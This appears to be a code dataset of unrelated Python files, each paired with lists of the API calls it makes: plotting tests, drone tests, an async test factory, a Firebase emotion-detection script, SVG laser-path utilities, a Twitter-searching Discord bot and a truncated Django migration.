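unpacked = UnpackedSequence(packed)
for original, recovered in zip(seqs, unpacked):
    assert torch.equal(original, recovered)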
from image_comparison import compare_images
import pytest
import util_config
import util_test
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_filled(name):
config = util_config.ConfigFilled(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_filled_quad_as_tri(name):
config = util_config.ConfigFilled(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_filled_corner(name):
config = util_config.ConfigFilledCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_filled_corner.png", name)
@pytest.mark.parametrize("name", util_test.all_names())
def test_config_lines(name):
if name == "mpl2005":
pytest.skip() # Line directions are not consistent.
config = util_config.ConfigLines(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines.png", name)
@pytest.mark.parametrize("name", util_test.quad_as_tri_names())
def test_config_lines_quad_as_tri(name):
config = util_config.ConfigLines(name, quad_as_tri=True)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_quad_as_tri.png", name)
@pytest.mark.parametrize("name", util_test.corner_mask_names())
def test_config_lines_corner(name):
config = util_config.ConfigLinesCorner(name)
image_buffer = config.save_to_buffer()
compare_images(image_buffer, "config_lines_corner.png", name)
|
[
"util_config.ConfigFilledCorner",
"util_test.all_names",
"util_test.quad_as_tri_names",
"pytest.skip",
"util_config.ConfigLines",
"util_config.ConfigLinesCorner",
"image_comparison.compare_images",
"util_test.corner_mask_names",
"util_config.ConfigFilled"
] |
[((195, 225), 'util_config.ConfigFilled', 'util_config.ConfigFilled', (['name'], {}), '(name)\n', (219, 225), False, 'import util_config\n'), ((273, 328), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled.png"""', 'name'], {}), "(image_buffer, 'config_filled.png', name)\n", (287, 328), False, 'from image_comparison import compare_images\n'), ((129, 150), 'util_test.all_names', 'util_test.all_names', ([], {}), '()\n', (148, 150), False, 'import util_test\n'), ((450, 498), 'util_config.ConfigFilled', 'util_config.ConfigFilled', (['name'], {'quad_as_tri': '(True)'}), '(name, quad_as_tri=True)\n', (474, 498), False, 'import util_config\n'), ((546, 613), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled_quad_as_tri.png"""', 'name'], {}), "(image_buffer, 'config_filled_quad_as_tri.png', name)\n", (560, 613), False, 'from image_comparison import compare_images\n'), ((364, 393), 'util_test.quad_as_tri_names', 'util_test.quad_as_tri_names', ([], {}), '()\n', (391, 393), False, 'import util_test\n'), ((730, 766), 'util_config.ConfigFilledCorner', 'util_config.ConfigFilledCorner', (['name'], {}), '(name)\n', (760, 766), False, 'import util_config\n'), ((814, 876), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_filled_corner.png"""', 'name'], {}), "(image_buffer, 'config_filled_corner.png', name)\n", (828, 876), False, 'from image_comparison import compare_images\n'), ((649, 678), 'util_test.corner_mask_names', 'util_test.corner_mask_names', ([], {}), '()\n', (676, 678), False, 'import util_test\n'), ((1064, 1093), 'util_config.ConfigLines', 'util_config.ConfigLines', (['name'], {}), '(name)\n', (1087, 1093), False, 'import util_config\n'), ((1141, 1195), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines.png"""', 'name'], {}), "(image_buffer, 'config_lines.png', name)\n", (1155, 1195), False, 'from image_comparison import compare_images\n'), ((912, 933), 'util_test.all_names', 'util_test.all_names', ([], {}), '()\n', (931, 933), False, 'import util_test\n'), ((1316, 1363), 'util_config.ConfigLines', 'util_config.ConfigLines', (['name'], {'quad_as_tri': '(True)'}), '(name, quad_as_tri=True)\n', (1339, 1363), False, 'import util_config\n'), ((1411, 1477), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines_quad_as_tri.png"""', 'name'], {}), "(image_buffer, 'config_lines_quad_as_tri.png', name)\n", (1425, 1477), False, 'from image_comparison import compare_images\n'), ((1231, 1260), 'util_test.quad_as_tri_names', 'util_test.quad_as_tri_names', ([], {}), '()\n', (1258, 1260), False, 'import util_test\n'), ((1593, 1628), 'util_config.ConfigLinesCorner', 'util_config.ConfigLinesCorner', (['name'], {}), '(name)\n', (1622, 1628), False, 'import util_config\n'), ((1676, 1737), 'image_comparison.compare_images', 'compare_images', (['image_buffer', '"""config_lines_corner.png"""', 'name'], {}), "(image_buffer, 'config_lines_corner.png', name)\n", (1690, 1737), False, 'from image_comparison import compare_images\n'), ((1513, 1542), 'util_test.corner_mask_names', 'util_test.corner_mask_names', ([], {}), '()\n', (1540, 1542), False, 'import util_test\n'), ((998, 1011), 'pytest.skip', 'pytest.skip', ([], {}), '()\n', (1009, 1011), False, 'import pytest\n')]
|
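compare_images here is a local test helper rather than a public library API; a hedged sketch of what such a helper typically does (the real signature and tolerance handling may differ):

import numpy as np
from PIL import Image

def compare_images_sketch(image_buffer, baseline_path, name, tol=0):
    # image_buffer is assumed to be a file-like PNG buffer (e.g. io.BytesIO).
    result = np.asarray(Image.open(image_buffer).convert('RGB'), dtype=int)
    baseline = np.asarray(Image.open(baseline_path).convert('RGB'), dtype=int)
    assert result.shape == baseline.shape, name
    assert np.abs(result - baseline).max() <= tol, name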
# -*- coding: utf-8 -*-
# Copyright 2018 <NAME>
# Distributed under the terms of the Apache License 2.0
"""
Test Aerial Objects
#####################
"""
import six
import json
import uuid
import numpy as np
from itertools import cycle
from dronedirector.aerial import AerialObject, Drone, SinusoidalDrone
class CaliRedwood(AerialObject):
"""Example of subclassing."""
def __init__(self):
super(CaliRedwood, self).__init__(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
def test_simple_aerial():
"""Test making a simple object on-the-fly."""
tree = AerialObject(altitude=cycle([100.0]),
latitude=cycle([37.8716]),
longitude=cycle([-122.2727]))
msg = tree.message()
assert isinstance(msg, six.string_types)
assert isinstance(json.loads(msg), dict)
def test_subclassing_ao():
"""Test subclassing :class:`~dronedirector.aerial.AerialObject`."""
tree = CaliRedwood()
msg = json.loads(tree.message()) # Tests for valid json
assert isinstance(msg, dict)
assert np.isclose(msg['altitude'], 100.0)
def test_drone():
"""Test basic drone creation."""
uid = uuid.uuid4()
drone = Drone(cycle([1000.0]), cycle([41.0]), region="New York", uid=uid,
longitude=cycle(np.sin(np.arange(0, 2*np.pi, np.pi/360))))
assert drone.region == "New York"
assert drone.uid == uid
msg = json.loads(drone.message())
assert len(msg) == 6
|
[
"uuid.uuid4",
"json.loads",
"numpy.isclose",
"numpy.arange",
"itertools.cycle"
] |
[((1186, 1220), 'numpy.isclose', 'np.isclose', (["msg['altitude']", '(100.0)'], {}), "(msg['altitude'], 100.0)\n", (1196, 1220), True, 'import numpy as np\n'), ((1288, 1300), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (1298, 1300), False, 'import uuid\n'), ((930, 945), 'json.loads', 'json.loads', (['msg'], {}), '(msg)\n', (940, 945), False, 'import json\n'), ((1319, 1334), 'itertools.cycle', 'cycle', (['[1000.0]'], {}), '([1000.0])\n', (1324, 1334), False, 'from itertools import cycle\n'), ((1336, 1349), 'itertools.cycle', 'cycle', (['[41.0]'], {}), '([41.0])\n', (1341, 1349), False, 'from itertools import cycle\n'), ((717, 731), 'itertools.cycle', 'cycle', (['[100.0]'], {}), '([100.0])\n', (722, 731), False, 'from itertools import cycle\n'), ((766, 782), 'itertools.cycle', 'cycle', (['[37.8716]'], {}), '([37.8716])\n', (771, 782), False, 'from itertools import cycle\n'), ((818, 836), 'itertools.cycle', 'cycle', (['[-122.2727]'], {}), '([-122.2727])\n', (823, 836), False, 'from itertools import cycle\n'), ((450, 464), 'itertools.cycle', 'cycle', (['[100.0]'], {}), '([100.0])\n', (455, 464), False, 'from itertools import cycle\n'), ((517, 533), 'itertools.cycle', 'cycle', (['[37.8716]'], {}), '([37.8716])\n', (522, 533), False, 'from itertools import cycle\n'), ((587, 605), 'itertools.cycle', 'cycle', (['[-122.2727]'], {}), '([-122.2727])\n', (592, 605), False, 'from itertools import cycle\n'), ((1420, 1456), 'numpy.arange', 'np.arange', (['(0)', '(2 * np.pi)', '(np.pi / 360)'], {}), '(0, 2 * np.pi, np.pi / 360)\n', (1429, 1456), True, 'import numpy as np\n')]
|
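The tests above feed every attribute as an infinite iterator, which is what lets message() pull a fresh value on each call; the pattern in isolation:

from itertools import cycle

altitudes = cycle([100.0, 110.0])
assert next(altitudes) == 100.0
assert next(altitudes) == 110.0
assert next(altitudes) == 100.0  # wraps around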
import asyncio
import inspect
import factory
class AsyncFactory(factory.Factory):
"""
Copied from
https://github.com/FactoryBoy/factory_boy/issues/679#issuecomment-673960170
"""
class Meta:
abstract = True
@classmethod
def _create(cls, model_class, *args, **kwargs):
async def maker_coroutine():
for key, value in kwargs.items():
# when using SubFactory, you'll have a Task in the corresponding kwarg
# await tasks to pass model instances instead
if inspect.isawaitable(value):
kwargs[key] = await value
# replace as needed by your way of creating model instances
document = model_class(*args, **kwargs)
await document.commit()
return document
# A Task can be awaited multiple times, unlike a coroutine.
# useful when a factory and a subfactory must share a same object
return asyncio.create_task(maker_coroutine())
@classmethod
async def create_batch(cls, size, **kwargs):
return [await cls.create(**kwargs) for _ in range(size)]
class BaseFactory(factory.Factory):
class Meta:
abstract = True
|
[
"inspect.isawaitable"
] |
[((559, 585), 'inspect.isawaitable', 'inspect.isawaitable', (['value'], {}), '(value)\n', (578, 585), False, 'import inspect\n')]
|
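Hypothetical usage of AsyncFactory above with a stand-in document class; the commit() coroutine mimics the ODM interface that _create expects:

import asyncio

class FakeDoc:
    def __init__(self, name):
        self.name = name

    async def commit(self):
        return self

class FakeDocFactory(AsyncFactory):
    class Meta:
        model = FakeDoc

    name = "example"

async def demo():
    doc = await FakeDocFactory.create()
    assert doc.name == "example"

asyncio.run(demo())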
import os
import cv2
import time
import imutils
import pyrebase
import numpy as np
from utils import *
import sys
import dlib
from skimage import io
#################### Initialize ####################
print("Start initializing")
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
emotion_dict = {0: "Angry", 1: "Disgusted", 2: "Fearful",
3: "Happy", 4: "Neutral", 5: "Sad", 6: "Surprised"}
firebase = init_firebase()
storage = firebase.storage()
db = firebase.database()
model, facecasc = init_model()
history_list = []
loop = 0
predictor_path = "./shape_predictor_68_face_landmarks.dat"
detector = dlib.get_frontal_face_detector()
predictor = dlib.shape_predictor(predictor_path)
reset_counter = 0
#################### Initialize ####################
print("Start looping")
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
while(1):
print("Loop ======================================================================", loop)
files = storage.list_files()
reset_counter += 1
for file in files:
if (file.name)[0] == "s" and file.name != "screenShot/":
if file.name not in history_list:
reset_counter = 0
history_list.append(file.name)
img_local_name = "imgs/" + os.path.basename(file.name) + ".png"
print(img_local_name)
storage.child(file.name).download(img_local_name)
gray_img = cv2.imread(
img_local_name, cv2.IMREAD_GRAYSCALE)
img = cv2.imread(img_local_name)
dets = detector(img, 1)
vec = np.empty([68, 2], dtype=int)
status = "Not Sleeping"
for k, d in enumerate(dets):
shape = predictor(img, d)
for b in range(68):
vec[b][0] = shape.part(b).x
vec[b][1] = shape.part(b).y
right_ear = compute_EAR(vec[42:48])
left_ear = compute_EAR(vec[36:42])
if (right_ear+left_ear)/2 < 0.2:
status = "sleeping"
print(status)
faces = facecasc.detectMultiScale(
gray_img, scaleFactor=1.3, minNeighbors=5)
for (x, y, w, h) in faces:
print("Detect Face")
roi_gray = gray_img[y:y + h, x:x + w]
cropped_img = np.expand_dims(np.expand_dims(
cv2.resize(roi_gray, (48, 48)), -1), 0)
prediction = model.predict(cropped_img)
maxindex = int(np.argmax(prediction))
if maxindex == 0 or maxindex == 1 or maxindex == 2 or maxindex == 4:
maxindex = 5
print(emotion_dict[maxindex])
if status == "sleeping":
data = {'cur_emotion': "sleeping"}
else:
data = {'cur_emotion': emotion_dict[maxindex]}
db.child("CUR_EMOTION").set(data)
if reset_counter >= 100:
reset_counter = 0
data = {'cur_emotion': "None"}
db.child("CUR_EMOTION").set(data)
loop += 1
    # time.sleep(1)
|
[
"os.path.basename",
"numpy.argmax",
"numpy.empty",
"cv2.imread",
"dlib.get_frontal_face_detector",
"dlib.shape_predictor",
"cv2.resize"
] |
[((616, 648), 'dlib.get_frontal_face_detector', 'dlib.get_frontal_face_detector', ([], {}), '()\n', (646, 648), False, 'import dlib\n'), ((661, 697), 'dlib.shape_predictor', 'dlib.shape_predictor', (['predictor_path'], {}), '(predictor_path)\n', (681, 697), False, 'import dlib\n'), ((1460, 1508), 'cv2.imread', 'cv2.imread', (['img_local_name', 'cv2.IMREAD_GRAYSCALE'], {}), '(img_local_name, cv2.IMREAD_GRAYSCALE)\n', (1470, 1508), False, 'import cv2\n'), ((1552, 1578), 'cv2.imread', 'cv2.imread', (['img_local_name'], {}), '(img_local_name)\n', (1562, 1578), False, 'import cv2\n'), ((1642, 1670), 'numpy.empty', 'np.empty', (['[68, 2]'], {'dtype': 'int'}), '([68, 2], dtype=int)\n', (1650, 1670), True, 'import numpy as np\n'), ((1289, 1316), 'os.path.basename', 'os.path.basename', (['file.name'], {}), '(file.name)\n', (1305, 1316), False, 'import os\n'), ((2678, 2699), 'numpy.argmax', 'np.argmax', (['prediction'], {}), '(prediction)\n', (2687, 2699), True, 'import numpy as np\n'), ((2542, 2572), 'cv2.resize', 'cv2.resize', (['roi_gray', '(48, 48)'], {}), '(roi_gray, (48, 48))\n', (2552, 2572), False, 'import cv2\n')]
|
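compute_EAR is imported from the local utils module and is not shown in this row; the standard eye-aspect-ratio formula it most likely implements (the project's version may differ) is:

import numpy as np

def compute_EAR(eye):
    """eye: six (x, y) landmarks for one eye, in dlib's 68-point ordering."""
    a = np.linalg.norm(eye[1] - eye[5])  # vertical distance 1
    b = np.linalg.norm(eye[2] - eye[4])  # vertical distance 2
    c = np.linalg.norm(eye[0] - eye[3])  # horizontal distance
    return (a + b) / (2.0 * c)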
# laser_path_utils.py
"""Utility functions for working with paths for laser cutting"""
import numpy as np
import svgpathtools.svgpathtools as SVGPT
# it's imporatant to clone and install the repo manually. The pip/pypi version is outdated
from laser_svg_utils import tree_to_tempfile
from laser_clipper import point_on_loops, point_inside_loop
def tempfile_to_paths(temp_svg):
"""open temp SVG file and return a path"""
# temp_svg.seek(0)
paths, attributes = SVGPT.svg2paths(temp_svg.name)
temp_svg.close()
return (paths, attributes)
def tree_to_paths(tree):
"""turns an svg tree into paths list"""
temp_svg = tree_to_tempfile(tree)
paths, _ = tempfile_to_paths(temp_svg)
svg_paths = []
for path in paths:
        if path:  # keep only non-empty paths
            svg_paths.append(path.d())
return svg_paths
def paths_to_loops(paths):
""""Convert a list of paths to a list of points"""
point_loop_list = []
for path_string in paths:
points = path_string_to_points(path_string)
if points is not None:
point_loop_list.append(points)
return point_loop_list
def combine_paths(paths, as_list=True):
"""combines path strings into a single string"""
combined = ""
first = True
for path in paths:
if not first:
combined += " "
combined += path
first = False
if as_list:
return [combined]
else:
return combined
def path_string_to_points(path_string):
"""Convert path string into a list of points"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return None
points = []
for segment in path:
segment_points = subpath_to_points(segment)
for point in segment_points:
if points == [] or point != points[-1]:
points.append(point)
return points
def subpath_to_points(segment):
"""Converts a path segment into a list of points"""
points = []
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
else:
points = points_from_curve(segment)
return points
def get_start(path_string):
"""returns start point (x, y) of a path string"""
path = SVGPT.parse_path(path_string)
start_xy = complex_to_xy(path.start)
return start_xy
def points_from_line(line):
"""returns endpoints of line"""
points_list = []
start = line.point(0)
end = line.point(1)
points_list.append(complex_to_xy(start))
points_list.append(complex_to_xy(end))
return points_list
def points_from_curve(curve, samples=20):
"""returns poins along a curve"""
points_list = []
for location in range(samples):
fraction = location / (samples-1)
point_on_curve = curve.point(fraction)
points_list.append(complex_to_xy(point_on_curve))
return points_list
def complex_to_xy(complex_point):
"""turns complex point (x+yj) into cartesian point [x,y]"""
xy_point = [complex_point.real, complex_point.imag]
return xy_point
def xy_to_complex(xy_point):
"""turns cartesian point [x,y] into complex point (x+yj)"""
complex_point = xy_point[0] + xy_point[1] * 1j
return complex_point
def loops_to_paths(loops):
"""turns a list of point loops into a list of path strings"""
paths = []
for loop in loops:
path = points_to_path(loop)
paths.append(path)
return paths
def points_to_path(points, closed=True):
"""turn a series of points into a path"""
first = True
data = "M "
for point in points:
if not first:
data += " L "
data += f"{point[0]},{point[1]}"
first = False
if closed:
data += " Z"
return data
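# Example (illustrative): points_to_path([[0, 0], [10, 0], [10, 10]])
# returns "M 0,0 L 10,0 L 10,10 Z"; pass closed=False to omit the "Z".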
def scale_path(path_string, scale):
"""scales a path string by a scale factor (float)"""
path = SVGPT.parse_path(path_string)
scaled_path = path.scaled(scale)
new_path_string = scaled_path.d()
return new_path_string
def move_path(path_string, xy_translation):
"""Takes a path string and xy_translation (x, y), and moves it x units over, and y units down"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_translation = xy_to_complex(xy_translation)
translated_path = path.translated(complex_translation)
translated_string = translated_path.d()
return translated_string
def get_angle(path_string):
"""measures the angle in degrees (CCW) from the path positive X axis (0,0), (0,1)"""
path = SVGPT.parse_path(path_string)
vector = path.point(1) - path.point(0)
angle = np.angle(vector, deg=True)
return angle
def rotate_path(path_string, angle_degrees, xy_point):
"""rotates a path string a given number of degrees (CCW) around point (x, y)"""
path = SVGPT.parse_path(path_string)
empty = SVGPT.Path()
if path == empty:
return ""
complex_point = xy_to_complex(xy_point)
rotated_path = path.rotated(angle_degrees, origin=complex_point)
rotated_string = rotated_path.d()
return rotated_string
def get_length(path_string):
"""returns the length of a path string"""
path = SVGPT.parse_path(path_string)
return path.length()
def get_all_segments(loops):
"""returns all of the segments from all of the loops"""
all_segments = []
for loop in loops:
loop_segments = get_loop_segments(loop)
all_segments = all_segments + loop_segments
return all_segments
def segments_overlap(first, second):
"""returns true if segments share more than a single point"""
first_path_string = points_to_path(first, closed=False)
second_path_string = points_to_path(second, closed=False)
first_path = SVGPT.parse_path(first_path_string)[0]
second_path = SVGPT.parse_path(second_path_string)[0]
overlaps = []
for point in first:
complex_point = xy_to_complex(point)
place_on_path = second_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
for point in second:
complex_point = xy_to_complex(point)
place_on_path = first_path.point_to_t(complex_point)
if place_on_path is not None:
if point not in overlaps:
overlaps.append(point)
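    # sharing two or more points means a common stretch, not just a touching endpoint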
overlap = len(overlaps) >= 2
return overlap
def get_loop_segments(loop):
"""returns a list of segments in a loop"""
segments = []
last_point = None
for this_point in loop:
if last_point is not None:
new_segment = [last_point, this_point]
segments.append(new_segment)
last_point = this_point
return segments
def segments_to_paths(segments):
"""converts list of segments into list of paths"""
paths = []
for segment in segments:
new_path = points_to_path(segment, closed=False)
paths.append(new_path)
return paths
def get_not_overlapping(first, second):
"""returns the segments of the first path that do not overlap with the second."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
not_overlapping = ""
segment_started = False
last_point = loop[-1]
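        # the loop is closed, so the point "before" the first one is the last one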
for point in loop:
if not point_on_loops(point, second_loops):
if not segment_started:
not_overlapping += f" M {last_point[0]},{last_point[1]}"
segment_started = True
if last_point != point:
not_overlapping += f" L {point[0]},{point[1]}"
else: # close the path
if segment_started:
not_overlapping += f" L {point[0]},{point[1]}"
output_paths.append(not_overlapping)
segment_started = False
not_overlapping = ""
last_point = point
if segment_started:
output_paths.append(not_overlapping)
return output_paths
def get_overlapping(first, second):
"""returns the overlapping segments of the first and second path."""
output_paths = []
first_loops = paths_to_loops(first)
second_loops = paths_to_loops(second)
for loop in first_loops:
overlapping = ""
segment_started = False
for point in loop:
if point_on_loops(point, second_loops):
if not segment_started:
overlapping += f" M {point[0]},{point[1]}"
segment_started = True
else:
overlapping += f" L {point[0]},{point[1]}"
else: # skip other points
if segment_started:
output_paths.append(overlapping)
overlapping = ""
segment_started = False
if segment_started:
output_paths.append(overlapping)
return output_paths
def divide_pathstring_parts(pathstring):
"""breaks single path string into substrings at each 'M' returning a list of path strings"""
substring = pathstring.strip()
paths = []
while 'M' in substring[1:]:
m_index = substring.find('M', 1)
if m_index > -1:
subpath = substring[0:m_index].strip()
paths.append(subpath)
substring = substring[m_index:].strip()
paths.append(substring)
return paths
# TODO: split open/closed separation into smaller chunks
def separate_closed_paths(paths):
"""takes a list of path strings
breaks non continuous paths and
joins connecting paths together
to return a list of closed paths """
discrete_paths = []
closed_paths = []
open_paths = []
dead_ends = []
for path in paths:
discrete_paths += divide_pathstring_parts(path)
for path in discrete_paths:
parsed_path = SVGPT.parse_path(path)
if parsed_path.isclosed():
closed_paths.append(path)
else:
open_paths.append(parsed_path)
while open_paths:
path = open_paths.pop()
new_path = None
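        # look for another open path that shares an endpoint, in either orientation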
for other_path in open_paths:
if path.end == other_path.start:
new_path = path.d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.end:
new_path = other_path.d() + " " + path.d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.end == other_path.end:
new_path = path.d() + " " + other_path.reversed().d().replace('M', 'L')
open_paths.remove(other_path)
break
elif path.start == other_path.start:
new_path = path.reversed().d() + " " + other_path.d().replace('M', 'L')
open_paths.remove(other_path)
break
if new_path is not None:
parsed_new_path = SVGPT.parse_path(new_path)
if parsed_new_path.isclosed():
closed_paths.append(new_path)
else:
open_paths.append(parsed_new_path)
else:
dead_ends.append(path.d())
open_paths = dead_ends
return closed_paths, open_paths
def is_inside(path, other_path):
"""checks if path is inside other_path and returns true or false"""
loop = paths_to_loops([path])[0]
other_loop = paths_to_loops([other_path])[0]
for point in loop:
if point_inside_loop(point, other_loop) == 1:
return True
return False
def path_to_segments(path_string):
"""breaks down a path into a list of segments"""
segments = []
path = SVGPT.parse_path(path_string)
for segment in path:
if isinstance(segment, SVGPT.path.Line): # pylint: disable=maybe-no-member
points = points_from_line(segment)
new_path_string = f"M {points[0][0]} {points[0][1]} L {points[1][0]} {points[1][1]}"
segments.append(new_path_string)
return segments
|
[
"svgpathtools.svgpathtools.svg2paths",
"numpy.angle",
"svgpathtools.svgpathtools.parse_path",
"laser_svg_utils.tree_to_tempfile",
"laser_clipper.point_on_loops",
"laser_clipper.point_inside_loop",
"svgpathtools.svgpathtools.Path"
] |
[((476, 506), 'svgpathtools.svgpathtools.svg2paths', 'SVGPT.svg2paths', (['temp_svg.name'], {}), '(temp_svg.name)\n', (491, 506), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((645, 667), 'laser_svg_utils.tree_to_tempfile', 'tree_to_tempfile', (['tree'], {}), '(tree)\n', (661, 667), False, 'from laser_svg_utils import tree_to_tempfile\n'), ((1558, 1587), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (1574, 1587), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((1601, 1613), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (1611, 1613), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((2289, 2318), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (2305, 2318), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((3913, 3942), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (3929, 3942), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4204, 4233), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4220, 4233), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4247, 4259), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (4257, 4259), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4619, 4648), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4635, 4648), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4704, 4730), 'numpy.angle', 'np.angle', (['vector'], {'deg': '(True)'}), '(vector, deg=True)\n', (4712, 4730), True, 'import numpy as np\n'), ((4900, 4929), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (4916, 4929), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((4943, 4955), 'svgpathtools.svgpathtools.Path', 'SVGPT.Path', ([], {}), '()\n', (4953, 4955), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5262, 5291), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (5278, 5291), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((11861, 11890), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path_string'], {}), '(path_string)\n', (11877, 11890), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5821, 5856), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['first_path_string'], {}), '(first_path_string)\n', (5837, 5856), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((5878, 5914), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['second_path_string'], {}), '(second_path_string)\n', (5894, 5914), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((10009, 10031), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['path'], {}), '(path)\n', (10025, 10031), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((8505, 8540), 'laser_clipper.point_on_loops', 'point_on_loops', (['point', 'second_loops'], {}), '(point, second_loops)\n', (8519, 8540), False, 'from laser_clipper import point_on_loops, point_inside_loop\n'), ((11129, 11155), 'svgpathtools.svgpathtools.parse_path', 'SVGPT.parse_path', (['new_path'], {}), '(new_path)\n', (11145, 11155), True, 'import svgpathtools.svgpathtools as SVGPT\n'), ((11658, 11694), 'laser_clipper.point_inside_loop', 'point_inside_loop', (['point', 'other_loop'], {}), '(point, other_loop)\n', (11675, 11694), False, 'from laser_clipper import point_on_loops, point_inside_loop\n'), ((7444, 7479), 'laser_clipper.point_on_loops', 'point_on_loops', (['point', 'second_loops'], {}), '(point, second_loops)\n', (7458, 7479), False, 'from laser_clipper import point_on_loops, point_inside_loop\n')]
|
import discord
import os
import requests, json
import tweepy
consumer_key=os.getenv('C_K')
consumer_secret=os.getenv('C_S')
access_token=os.getenv('A_T')
access_token_secret=os.getenv('A_S')
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
r = requests.get('https://api.github.com/user', auth=('user', 'pass'))
print(r.json())
print(r.status_code)
client = discord.Client()
@client.event
async def on_ready():
print('hello, I\'m {0.user}'.format(client))
@client.event
async def on_message(msg):
if msg.author==client.user:
return
if msg:
print(msg)
await msg.channel.send('hey {}'.format(msg.author.name))
tweets = api.search(msg.content,lang='en',result_type='recent',include_entities="mashable")
for tweet in tweets:
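            # skip retweets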
if not tweet.text.startswith('RT'):
await msg.channel.send(tweet.user.screen_name+' : \n'+tweet.text)
client.run(os.getenv('TOKEN'))
|
[
"tweepy.API",
"requests.get",
"tweepy.OAuthHandler",
"os.getenv",
"discord.Client"
] |
[((75, 91), 'os.getenv', 'os.getenv', (['"""C_K"""'], {}), "('C_K')\n", (84, 91), False, 'import os\n'), ((108, 124), 'os.getenv', 'os.getenv', (['"""C_S"""'], {}), "('C_S')\n", (117, 124), False, 'import os\n'), ((138, 154), 'os.getenv', 'os.getenv', (['"""A_T"""'], {}), "('A_T')\n", (147, 154), False, 'import os\n'), ((175, 191), 'os.getenv', 'os.getenv', (['"""A_S"""'], {}), "('A_S')\n", (184, 191), False, 'import os\n'), ((199, 249), 'tweepy.OAuthHandler', 'tweepy.OAuthHandler', (['consumer_key', 'consumer_secret'], {}), '(consumer_key, consumer_secret)\n', (218, 249), False, 'import tweepy\n'), ((314, 330), 'tweepy.API', 'tweepy.API', (['auth'], {}), '(auth)\n', (324, 330), False, 'import tweepy\n'), ((336, 402), 'requests.get', 'requests.get', (['"""https://api.github.com/user"""'], {'auth': "('user', 'pass')"}), "('https://api.github.com/user', auth=('user', 'pass'))\n", (348, 402), False, 'import requests, json\n'), ((449, 465), 'discord.Client', 'discord.Client', ([], {}), '()\n', (463, 465), False, 'import discord\n'), ((980, 998), 'os.getenv', 'os.getenv', (['"""TOKEN"""'], {}), "('TOKEN')\n", (989, 998), False, 'import os\n')]
|
# Generated by Django 2.0.7 on 2019-05-08 12:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app_warehouse', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='cargoin',
name='reason',
            field=models.CharField(default='default', max_length=20, verbose_name='入库原因'),
),
migrations.AddField(
model_name='cargoin',
name='shelflife',
            field=models.IntegerField(blank=True, default=72, null=True, verbose_name='保质期'),
),
migrations.AddField(
model_name='cargoout',
name='reason',
            field=models.CharField(default='default', max_length=20, verbose_name='出库原因'),
),
migrations.AlterField(
model_name='cargoin',
name='goods',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='cargoin_by_goods', to='app_goods.Goods'),
),
migrations.AlterField(
model_name='cargoin',
name='staletime',
            field=models.DateTimeField(blank=True, null=True, verbose_name='过期时间'),
),
migrations.AlterField(
model_name='cargoin',
